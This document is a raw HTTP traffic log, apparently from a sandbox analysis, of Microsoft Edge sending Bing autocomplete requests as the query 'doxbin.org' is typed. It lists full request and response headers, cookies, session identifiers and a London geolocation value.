useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-IIqZHxqg1XO5mceQFIowE6u7RziNv2r+m/qBu2SnlV8='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:34 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:34 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=SID=20D49CD7B14D64CB15EA899CB0AB6584; domain=.bing.com; path=/; HttpOnly
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:34 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306914.7f16d33
GET

https://www.bing.com/qbox?query=dox&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=dafa1e88f5cb49d88c7f3e2b6b407c53&oit=1&cp=3&pgcl=9

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=dox&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=dafa1e88f5cb49d88c7f3e2b6b407c53&oit=1&cp=3&pgcl=9 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 200

content-length: 262
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a232e604bd3a58cbbcb38b5955a
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-dNub4nnQsAYBkws/ANDpeHaQddmia0NAgX4lVm3nTVc='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:35 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:35 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=SID=2EA65FC5C2A0645D1E594A8EC34565CC; domain=.bing.com; path=/; HttpOnly
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:35 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306915.7f17184
GET

https://www.bing.com/qbox?query=doxb&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=ee2a0013a1884656907f054b822edafc&oit=1&cp=4&pgcl=9

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=doxb&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=ee2a0013a1884656907f054b822edafc&oit=1&cp=4&pgcl=9 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 200

content-length: 261
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a23009744229f985fc4d1bb2b43
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-UBrztvUgeyeTILFUKrAlGoQ5RImQq3L212hhfqiqOqU='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:35 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:35 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=SID=191DC0980E6A692837A8D5D30F5C683A; domain=.bing.com; path=/; HttpOnly
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:35 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306915.7f17279
GET

https://www.bing.com/qbox?query=doxbi&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=c8ef83434c484c5fa1aff10525e68c55&oit=1&cp=5&pgcl=9

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=doxbi&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=c8ef83434c484c5fa1aff10525e68c55&oit=1&cp=5&pgcl=9 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 200

content-length: 261
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a23bf4e4661b51004133eb07c0b
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-lIib8DkS0Jui0JAAZIobkImQJIllQMMCehob6xXl5lk='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:35 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:35 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=SID=18E2D0773F896A302CD3C53C3E7C6B6F; domain=.bing.com; path=/; HttpOnly
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:35 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306915.7f17352
GET

https://www.bing.com/qbox?query=doxbin&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=e0a1783b40e0485790488376a50d7a29&oit=1&cp=6&pgcl=9

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=doxbin&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=e0a1783b40e0485790488376a50d7a29&oit=1&cp=6&pgcl=9 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 200

content-length: 221
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a2489d949089a0bf742d128c59b
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-cr31HiJe1WQ60mnAwqTfweCIIPa6XPK1hEhpwI0pPWE='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:36 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:36 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=SID=15C4F752ECE568A92126E219ED486980; domain=.bing.com; path=/; HttpOnly
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:36 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306916.7f1761c
GET

https://www.bing.com/qbox?query=doxbino&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=c184a01a9cea40eaa35d751cf790d89a&oit=1&cp=7&pgcl=9

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=doxbino&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=c184a01a9cea40eaa35d751cf790d89a&oit=1&cp=7&pgcl=9 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 200

content-length: 244
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a2433694e3eaff0bfb4b6bc4d6d
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-VmK8VSw1acArYRVIhcQcAuK4aQqxzkuA8YjMneDga2A='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:36 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:36 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=SID=0FE498D991AF6C271AC58D9290526DEB; domain=.bing.com; path=/; HttpOnly
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:36 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306916.7f176aa
GET

https://www.bing.com/qbox?query=doxbinor&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=163a659216a240a78064a5eda70846ad&oit=1&cp=8&pgcl=9

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=doxbinor&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=163a659216a240a78064a5eda70846ad&oit=1&cp=8&pgcl=9 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 200

content-length: 149
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a248708425fa2aead1669573c3c
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-oxmJpEzmLW6cvWdjDTn7ha1DJCiofEETQPOUcGzcF58='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:36 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:36 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=SID=1C672D2C730D6D4E340C386772E56CBA; domain=.bing.com; path=/; HttpOnly
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:36 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306916.7f17766
GET

https://www.bing.com/qbox?query=doxbinorg&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=27a7069321914624af49b9d23b27f02d&oit=1&cp=9&pgcl=9

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=doxbinorg&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=27a7069321914624af49b9d23b27f02d&oit=1&cp=9&pgcl=9 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 200

content-length: 244
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a2543e545b29c695a942f98174f
